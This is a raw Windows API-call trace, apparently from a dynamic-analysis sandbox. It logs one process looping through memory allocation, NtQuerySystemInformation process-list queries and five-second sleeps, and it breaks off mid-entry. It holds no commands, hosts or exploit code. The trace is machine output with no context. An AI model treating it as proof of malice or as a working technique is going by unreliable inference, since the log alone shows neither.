[0151.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.029] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.043] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.059] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.075] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.092] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.128] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.136] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.156] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.170] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.184] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.199] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.215] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.233] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.246] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.262] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.278] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.294] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.309] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.324] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.341] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.357] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.371] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 